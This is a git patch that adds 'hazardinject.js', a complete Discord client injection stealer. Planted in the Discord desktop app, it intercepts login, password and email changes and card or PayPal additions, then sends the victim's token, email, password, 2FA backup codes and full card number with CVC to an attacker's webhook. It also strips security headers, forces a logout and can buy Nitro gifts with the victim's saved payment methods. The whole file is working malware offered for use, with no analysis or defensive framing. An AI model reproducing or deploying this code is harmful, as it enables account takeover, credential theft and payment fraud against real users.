From 11b6dd292b460aeb0846c0e52e9fde246d898714 Mon Sep 17 00:00:00 2001 From: What about KSCH <54140748+KSCHdsc@users.noreply.github.com> Date: Mon, 28 Mar 2022 16:31:23 +0200 Subject: [PATCH] Add files via upload --- hazardinject.js | 582 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 582 insertions(+) create mode 100644 hazardinject.js diff --git a/hazardinject.js b/hazardinject.js new file mode 100644 index 0000000..fac2547 --- /dev/null +++ b/hazardinject.js @@ -0,0 +1,582 @@ +const args = process.argv; +const fs = require('fs'); +const path = require('path'); +const querystring = require('querystring'); +const { BrowserWindow, session } = require('electron') + +const config = { + auto_buy_nitro: false, + ping_on_run: false, + ping_val: '@everyone', + embed_name: 'Discord Injection', //name of the webhook thats gonna send the info + embed_icon: 'https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png'.replace(/ /g,'%20'), //icon for the webhook thats gonna send the info (yes you can have spaces in the url) + embed_color: 8363488, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it) + webhook: '%WEBHOOK%', //your discord webhook there obviously + /* DON'T TOUCH UNDER HERE IF UNLESS YOU'RE MODIFYING THE INJECTION OR KNOW WHAT YOU'RE DOING */ + api: 'https://discord.com/api/v9/users/@me', + bin: 'https://dpaste.com/api/', + nitro: { + boost: { + year: { + id: "521847234246082599", + sku: "511651885459963904", + price: "9999", + }, + month: { + id: "521847234246082599", + sku: "511651880837840896", + price: "999", + }, + }, + classic: { + month: { + id: "521846918637420545", + sku: "511651871736201216", + price: "499", + }, + }, + }, + filter: { + urls: [ + 'https://discord.com/api/v*/users/@me', + 'https://discordapp.com/api/v*/users/@me', + 'https://*.discord.com/api/v*/users/@me', + 'https://discordapp.com/api/v*/auth/login', + 'https://discord.com/api/v*/auth/login', + 'https://*.discord.com/api/v*/auth/login', + 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts', + 'https://api.stripe.com/v*/tokens', + ] + }, + filter2: { + urls: [ + 'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json', + 'https://*.discord.com/api/v*/applications/detectable', + 'https://discord.com/api/v*/applications/detectable', + 'https://*.discord.com/api/v*/users/@me/library', + 'https://discord.com/api/v*/users/@me/library', + 'https://*.discord.com/api/v*/users/@me/billing/subscriptions', + 'https://discord.com/api/v*/users/@me/billing/subscriptions', + 'wss://remote-auth-gateway.discord.gg/*', + ] + } +} + +const discordPath = (function() { + const useRelease = args[2] && args[2].toLowerCase() === "release"; + const releaseInput = useRelease ? args[3] && args[3].toLowerCase() : args[2] && args[2].toLowerCase(); + const release = releaseInput === "canary" ? "Discord Canary" : releaseInput === "ptb" ? "Discord PTB" : "Discord"; + let resourcePath = ""; + if (process.platform === "win32") { + const basedir = path.join(process.env.LOCALAPPDATA, release.replace(/ /g, "")); + const version = fs.readdirSync(basedir).filter(f => fs.lstatSync(path.join(basedir, f)).isDirectory() && f.split(".").length > 1).sort().reverse()[0]; + resourcePath = path.join(basedir, version, "resources"); + } + else if (process.platform === "darwin") { + const appPath = releaseInput === "canary" ? path.join("/Applications", "Discord Canary.app") + : releaseInput === "ptb" ? path.join("/Applications", "Discord PTB.app") + : useRelease && args[3] ? args[3] ? args[2] : args[2] + : path.join("/Applications", "Discord.app"); + + resourcePath = path.join(appPath, "Contents", "Resources"); + } + + if (fs.existsSync(resourcePath)) return resourcePath; + return ""; +})(); + +function updateCheck() { + const appPath = path.join(discordPath, "app"); + const packageJson = path.join(appPath, "package.json"); + const resourceIndex = path.join(appPath, "index.js"); + if (!fs.existsSync(appPath)) fs.mkdirSync(appPath); + if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson, (err) => {}); + if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex, (err) => {}); + + + if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0; + fs.rmdirSync(path.join(__dirname, 'initiation')); + execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`) + return !1; +} + +const execScript = async(script) => { + const window = BrowserWindow.getAllWindows()[0]; + return await window.webContents.executeJavaScript(script, !0) +}; + +const dpaste = async(content) => { + const raw = await execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("POST", "${config.bin}", false); + xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); + xmlHttp.send('content=${encodeURIComponent(content)}&expiry_days=30'); + xmlHttp.responseText;`) + return raw+'.txt' +}; + +const getInfo = async(token) => { + const info = await execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("GET", "${config.api}", false); + xmlHttp.setRequestHeader("Authorization", "${token}"); + xmlHttp.send(null); + xmlHttp.responseText;`) + return JSON.parse(info) +}; + +const getMfa = async(password, token) => { + if (!token.startsWith('.mfa')) return 'N/A'; + let content = ""; + const mfa = await execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("POST", "${config.api}/mfa/codes", false); + xmlHttp.setRequestHeader('Content-Type', 'application/json'); + xmlHttp.setRequestHeader("authorization", "${token}"); + xmlHttp.send(JSON.stringify({\"password\":\"${password}\",\"regenerate\":false})); + xmlHttp.responseText + `) + const json = JSON.parse(mfa) + let codes = json.backup_codes + const r = codes.filter((code) => { + return code.consumed === null + }) + for (let i in r) { + content += `${r[i].code.insert(4, "-")}\n` + } + const paste = await dpaste(content); + return `[click me!](${paste})` +}; + +const fetchBilling = async(token) => { + const bill = await execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("GET", "${config.api}/billing/payment-sources", false); + xmlHttp.setRequestHeader("Authorization", "${token}"); + xmlHttp.send(null); + xmlHttp.responseText`) + if (bill && !bill.length) { + return ""; + } + return JSON.parse(JSON.parse(bill)) +}; +const getBilling = async (token) => { + const data = await fetchBilling(token) + if (data === "") return "❌"; + let billing = ""; + data.forEach(x => { + if (x.type === 2 && !x.invalid) { + billing += "✔️" + " <:paypal:951139189389410365>"; + } else if (x.type === 1 && !x.invalid) { + billing += "✔️" + " 💳"; + } else { + billing = "❌"; + }; + }); + if (billing === "") billing = "❌" + return billing; +}; + +const Purchase = async (token, id, _type, _time) => { + const req = execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("POST", "${config.api}/store/skus/${config.nitro[_type][_time]['id']}/purchase", false); + xmlHttp.setRequestHeader("Authorization", "${token}"); + xmlHttp.send(${JSON.stringify( + { + "gift": true, + "sku_subscription_plan_id": config.nitro[_type][_time]['sku'], + "payment_source_id": id, + "payment_source_token": 'None', + "expected_amount": config.nitro[_type][_time]['price'], + "expected_currency": "usd", + "purchase_token": "500fb34b-671a-4614-a72e-9d13becc2e95" + } + )}); + xmlHttp.responseText`) + if (req['gift_code']) { + return 'https://discord.gift/'+req['gift_code']; + } else return null; +}; + +const buyNitro = async (token) => { + if (!config.auto_buy_nitro) return 'Auto Buy Nitro disabled'; + const data = await fetchBilling(token); + const valid = [] + data.forEach(x => { + if (x.type === 2 && !x.invalid) { + valid.push(x.id) + } else if (x.type === 1 && !x.invalid) { + valid.push(x.id) + } + }); + for (let id in valid) { + const first = Purchase(token, id, 'boost', 'year') + if (first !== null) { + return first; + } else { + const second = Purchase(token, id, 'boost', 'month') + if (second !== null) { + return second; + } else { + const third = Purchase(token, id, 'classic', 'month') + if (third !== null) { + return third; + } else { + return 'Failed to Purchase Gift' + } + } + } + }; +}; + +const getNitro = (flags) => { + switch (flags) { + case 0: + return "No Nitro"; + case 1: + return "Nitro Classic"; + case 2: + return "Nitro Boost"; + default: + return "No Nitro"; + }; +}; + +const getBadges = (flags) => { + let badges = ""; + switch (flags) { + case 1: + badges += "Discord Staff, " + break; + case 2: + badges += "Partnered Server Owner, " + break; + case 131072: + badges += "Discord Developer, " + break; + case 4: + badges += "Hypesquad Event, " + break; + case 16384: + badges += "Gold BugHunter, " + break; + case 8: + badges += "Green BugHunter, " + break; + case 512: + badges += "Early Supporter, " + break; + case 128: + badges += "HypeSquad Brillance, " + break; + case 64: + badges += "HypeSquad Brillance, " + break; + case 256: + badges += "HypeSquad Balance, " + break; + case 0: + badges = "None" + break; + default: + badges = "None" + break; + } + return badges +} +const hooker = (content) => { + execScript(`var xmlHttp = new XMLHttpRequest(); + xmlHttp.open("POST", "${config.webhook}", true); + xmlHttp.setRequestHeader('Content-Type', 'application/json'); + xmlHttp.setRequestHeader('Access-Control-Allow-Origin', '*'); + xmlHttp.send(JSON.stringify(${JSON.stringify(content)})); +`) +} +const login = async (email, password, token) => { + const json = await getInfo(token); + const nitro = getNitro(json.premium_type); + const badges = getBadges(json.flags) + const billing = await getBilling(token) + const mfa = await getMfa(password, token); + const content = { + username: config.embed_name, + avatar_url: config.embed_icon, + embeds: [ + { + "color": config.embed_color, + "fields": [ + { + "name": "**Account Info**", + "value": `Email: **${email}** - Password: **${password}**`, + "inline": false + }, + { + "name": "**Other Info**", + "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, + "inline": false + }, + { + "name": "**Token**", + "value": `\`${token}\``, + "inline": false + } + ], + "author": { + "name": json.username +"#" + json.discriminator + "・" + json.id, + "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` + }, + "footer": { + "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" + } + } + ] + } + if (config.ping_on_run) content['content'] = config.ping_val; + hooker(content) +} +const passwordChanged = async (oldpassword, newpassword, token) => { + const json = await getInfo(token); + const nitro = getNitro(json.premium_type); + const badges = getBadges(json.flags) + const billing = await getBilling(token) + const mfa = await getMfa(newpassword, token) + const content = { + username: config.embed_name, + avatar_url: config.embed_icon, + embeds: [ + { + "color": config.embed_color, + "fields": [ + { + "name": "**Password Changed**", + "value": `Email: **${json.email}**\nOld Password: **${oldpassword}**\nNew Password: **${newpassword}**`, + "inline": true + }, + { + "name": "**Other Info**", + "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, + "inline": true + }, + { + "name": "**Token**", + "value": `\`${token}\``, + "inline": false + } + ], + "author": { + "name": json.username +"#" + json.discriminator + "・" + json.id, + "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` + }, + "footer": { + "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" + } + } + ] + } + if (config.ping_on_run) content['content'] = config.ping_val; + hooker(content) +} +const emailChanged = async (email, password, token) => { + const json = await getInfo(token); + const nitro = getNitro(json.premium_type); + const badges = getBadges(json.flags) + const billing = await getBilling(token) + const mfa = await getMfa(password, token) + const content = { + username: config.embed_name, + avatar_url: config.embed_icon, + embeds: [ + { + "color": config.embed_color, + "fields": [ + { + "name": "**Email Changed**", + "value": `New Email: **${email}**\nPassword: **${password}**`, + "inline": true + }, + { + "name": "**Other Info**", + "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, + "inline": true + }, + { + "name": "**Token**", + "value": `\`${token}\``, + "inline": false + } + ], + "author": { + "name": json.username +"#" + json.discriminator + "・" + json.id, + "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` + }, + "footer": { + "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" + } + } + ] + } + if (config.ping_on_run) content['content'] = config.ping_val; + hooker(content) +} + +const PaypalAdded = async (token) => { + const json = await getInfo(token); + const nitro = getNitro(json.premium_type); + const badges = getBadges(json.flags) + const billing = getBilling(token) + const code = await buyNitro(token) + const content = { + username: config.embed_name, + avatar_url: config.embed_icon, + embeds: [ + { + "color": config.embed_color, + "fields": [ + { + "name": "**Paypal Added**", + "value": `Nitro code: \`${code}\``, + "inline": false + }, + { + "name": "**Other Info**", + "value": `Nitro Type: **${nitro}*\nBadges: **${badges}**\nBilling: **${billing}**`, + "inline": false + }, + { + "name": "**Token**", + "value": `\`${token}\``, + "inline": false + } + ], + "author": { + "name": json.username +"#" + json.discriminator + "・" + json.id, + "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` + }, + "footer": { + "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" + } + } + ] + } + if (config.ping_on_run) content['content'] = config.ping_val; + hooker(content) +} +const ccAdded = async (number, cvc, expir_month, expir_year, token) => { + const json = await getInfo(token); + const nitro = getNitro(json.premium_type); + const badges = getBadges(json.flags) + const billing = await getBilling(token) + const code = await buyNitro(token) + const content = { + username: config.embed_name, + avatar_url: config.embed_icon, + embeds: [ + { + "color": config.embed_color, + "fields": [ + { + "name": "**Credit Card Added**", + "value": `Credit Card Number: ${number}\nCVC: ${cvc}\nCredit Card Expiration: ${expir_month}/${expir_year}`, + "inline": true + }, + { + "name": "**Other Info**", + "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`, + "inline": true + }, + { + "name": "**Nitro Code**", + "value": `\`${code}\``, + "inline": false + }, + { + "name": "**Token**", + "value": `\`${token}\``, + "inline": false + } + ], + "author": { + "name": json.username +"#" + json.discriminator + "・" + json.id, + "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` + }, + "footer": { + "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" + } + } + ] + } + if (config.ping_on_run) content['content'] = config.ping_val; + hooker(content) +} + +session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => { + if (details.url.startsWith("wss://")) { + callback({ + cancel: true + }) + return; + } + if (updateCheck()) {} + + callback({}) + return; +}) + +session.defaultSession.webRequest.onHeadersReceived((details, callback) => { + if (details.url.startsWith(config.webhook)) { + if (details.url.includes("discord.com")) { + callback({ + responseHeaders: Object.assign({ + 'Access-Control-Allow-Headers': "*" + }, details.responseHeaders) + }); + } else { + callback({ + responseHeaders: Object.assign({ + "Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"], + 'Access-Control-Allow-Headers': "*", + "Access-Control-Allow-Origin": "*" + }, details.responseHeaders) + }); + } + } else { + delete details.responseHeaders['content-security-policy']; + delete details.responseHeaders['content-security-policy-report-only']; + + callback({ + responseHeaders: { + ...details.responseHeaders, + 'Access-Control-Allow-Headers': "*" + } + }) + } +}) + +session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => { + const unparsedData = details.uploadData[0].bytes + const data = JSON.parse(Buffer.from(unparsedData).toString()) + const token = await execScript(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`) + + switch (true) { + case details.url.endsWith('login'): + login(data.login, data.password, token) + break; + + case details.url.endsWith('users/@me') && details.method === 'PATCH' && data.password: + if (data.email) { + emailChanged(data.email, data.password, token) + }; + if (data.new_password) { + passwordChanged(data.password, data.new_password, token) + } + break; + + case details.url.endsWith('tokens') && details.method === "POST": + const item = querystring.parse(unparsedData.toString()) + ccAdded(item["card[number]"], item["card[cvc]"], item["card[exp_month]"], item["card[exp_year]"], token) + break; + + case details.url.endsWith('paypal_accounts') && details.method === "POST": + PaypalAdded(token) + break; + default: + break; + } +}); +module.exports = require('./core.asar') \ No newline at end of file